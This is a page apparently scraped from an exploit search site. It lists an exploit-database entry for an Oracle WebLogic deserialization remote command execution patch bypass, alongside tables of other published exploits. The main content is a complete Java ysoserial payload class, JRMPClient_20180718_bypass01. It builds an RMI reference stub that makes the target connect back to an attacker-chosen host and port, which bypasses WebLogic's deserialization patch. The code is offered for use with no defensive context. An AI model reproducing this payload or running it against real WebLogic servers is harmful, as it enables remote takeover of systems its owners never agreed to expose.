Menu

Improved exploit search engine. Try python and hit enter

"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)"

Author

allyshka

Platform

multiple

Release date

2019-10-25

Release Date Title Type Platform Author
2019-03-21 "Rails 5.2.1 - Arbitrary File Content Disclosure" webapps multiple NotoriousRebel
2019-03-19 "Google Chrome < M73 - FileSystemOperationRunner Use-After-Free" dos multiple "Google Security Research"
2019-03-19 "Google Chrome < M73 - MidiManagerWin Use-After-Free" dos multiple "Google Security Research"
2019-03-19 "Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter" dos multiple "Google Security Research"
2019-03-19 "Google Chrome < M73 - Double-Destruction Race in StoragePartitionService" dos multiple "Google Security Research"
2019-03-18 "BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)" remote multiple Metasploit
2019-03-15 "NetData 1.13.0 - HTML Injection" webapps multiple s4vitar
2019-03-14 "Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution" remote multiple sud0woodo
2019-03-11 "Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)" webapps multiple AkkuS
2019-03-08 "OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-01-11 "OpenSSH SCP Client - Write Arbitrary Files" remote multiple "Harry Sintonen"
2018-03-28 "TeamCity < 9.0.2 - Disabled Registration Bypass" remote multiple allyshka
2019-10-25 "Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)" remote multiple allyshka
2019-03-01 "tcpdump < 4.9.3 - Multiple Heap-Based Out-of-Bounds Reads" dos multiple "Google Security Research"
2019-03-01 "Google Chrome < M72 - FileWriterImpl Use-After-Free" dos multiple "Google Security Research"
2019-03-01 "Google Chrome < M72 - Use-After-Free in RenderProcessHostImpl Binding for P2PSocketDispatcherHost" dos multiple "Google Security Research"
2019-03-01 "Google Chrome < M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free" dos multiple "Google Security Research"
2019-03-01 "Google Chrome < M72 - PaymentRequest Service Use-After-Free" dos multiple "Google Security Research"
2019-02-22 "Quest NetVault Backup Server < 11.4.5 - Process Manager Service SQL Injection / Remote Code Execution" webapps multiple "Chris Anastasio"
2019-02-22 "WebKit JSC - reifyStaticProperty Needs to set the PropertyAttribute::CustomAccessor flag for CustomGetterSetter" dos multiple "Google Security Research"
2019-02-18 "Comodo Dome Firewall 2.7.0 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-18 "ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-18 "Apache CouchDB 2.3.0 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-18 "M/Monit 3.7.2 - Privilege Escalation" webapps multiple "Dolev Farhi"
2019-02-11 "Indusoft Web Studio 8.1 SP2 - Remote Code Execution" remote multiple "Jacob Baines"
2019-02-06 "Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows" dos multiple "Google Security Research"
2019-02-04 "pfSense 2.4.4-p1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-04 "Nessus 8.2.1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-01-31 "macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics" dos multiple "Google Security Research"
2019-01-31 "macOS < 10.14.3 / iOS < 12.1.3 XNU - 'vm_map_copy' Optimization which Requires Atomicity isn't Atomic" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-12-12 "phpBB 3.2.3 - Remote Code Execution" webapps php allyshka
2019-03-01 "WordPress Core 5.0 - Remote Code Execution" webapps php allyshka
2018-03-28 "TeamCity < 9.0.2 - Disabled Registration Bypass" remote multiple allyshka
2019-10-25 "Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)" remote multiple allyshka
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46513/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team
// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
package ysoserial.payloads;

import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;

import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;


@SuppressWarnings ( {
    "restriction"
} )
@PayloadTest( harness = "ysoserial.payloads.JRMPReverseConnectSMTest")
@Authors({ Authors.MBECHLER })
public class JRMPClient_20180718_bypass01 extends PayloadRunner implements
ObjectPayload<ReferenceWrapper_Stub> {
    public ReferenceWrapper_Stub getObject ( final String command ) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID id = new ObjID(new Random().nextInt());
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        ReferenceWrapper_Stub stud = new ReferenceWrapper_Stub(ref);
        return stud;
    }


    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient_20180718_bypass01.class.getClassLoader());
        PayloadRunner.run(JRMPClient_20180718_bypass01.class, args);
    }
}